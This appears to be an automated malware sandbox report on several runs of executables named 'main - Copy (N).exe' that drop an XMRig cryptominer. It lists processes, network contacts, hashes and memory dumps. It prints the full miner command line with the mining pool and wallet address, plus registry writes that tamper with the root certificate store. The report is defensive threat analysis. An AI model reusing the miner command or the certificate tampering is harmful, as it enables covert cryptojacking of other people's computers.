memory/3120-27-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-28-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-29-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-30-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-31-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-32-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-33-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-34-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-35-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-36-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-37-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-38-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-39-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-40-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-41-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-42-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-43-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-44-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-45-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-46-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-47-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-48-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-49-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-50-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-51-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-52-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-53-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-54-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-55-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-56-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-57-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-58-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-59-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-60-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-61-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-62-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-63-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-64-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-65-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-66-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-67-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-68-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-69-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-70-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-71-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-72-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-73-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-74-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-75-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-76-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-77-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-78-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-79-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-80-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-81-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-82-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1795s

Max time network

1788s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783
a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 233.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/528-14-0x00000150FC060000-0x00000150FC080000-memory.dmp

memory/528-15-0x00000150FC0B0000-0x00000150FC0D0000-memory.dmp

memory/528-16-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-17-0x00000150FD980000-0x00000150FD9A0000-memory.dmp

memory/528-18-0x00000150FD9A0000-0x00000150FD9C0000-memory.dmp

memory/528-19-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-20-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-21-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-22-0x00000150FD980000-0x00000150FD9A0000-memory.dmp

memory/528-23-0x00000150FD9A0000-0x00000150FD9C0000-memory.dmp

memory/528-24-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-25-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-26-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-27-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-28-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-29-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-30-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-31-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-32-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-33-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-34-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-35-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-36-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-37-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-38-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-39-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-40-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-41-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-42-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-43-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-44-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-45-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-46-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-47-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-48-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-49-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-50-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-51-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-52-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-53-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-54-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-55-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-56-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-57-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-58-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-59-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-60-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-61-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-62-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-63-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-64-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-65-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-66-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-67-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-68-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-69-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-70-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-71-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-72-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-73-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-74-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-75-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-76-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-77-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-78-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-79-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-80-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-81-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-82-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:47

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.193:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 193.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4872-14-0x00000162BBEB0000-0x00000162BBED0000-memory.dmp

memory/4872-15-0x00000162BBEF0000-0x00000162BBF10000-memory.dmp

memory/4872-16-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-17-0x00000162BD7E0000-0x00000162BD800000-memory.dmp

memory/4872-18-0x00000162BD7C0000-0x00000162BD7E0000-memory.dmp

memory/4872-19-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-20-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-23-0x00000162BD7C0000-0x00000162BD7E0000-memory.dmp

memory/4872-22-0x00000162BD7E0000-0x00000162BD800000-memory.dmp

memory/4872-21-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-24-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-25-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-26-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-27-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-28-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-29-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-30-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-31-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-32-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-33-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-34-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-35-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-36-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-37-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-38-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-39-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-40-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-41-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-42-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-43-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-44-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-45-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-46-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-47-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-48-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-49-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-50-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-51-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-52-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-53-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-54-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-55-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-56-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-57-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-58-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-59-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-60-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-61-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-62-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-63-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-64-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-65-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-66-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-67-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-68-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-69-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-70-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-71-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-72-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-73-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-74-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-75-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-76-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-77-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-78-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-79-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-80-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-81-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

memory/4872-82-0x00007FF7ABE10000-0x00007FF7AC913000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1798s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
NL 23.62.61.194:443 www.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 177.23.48.23.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
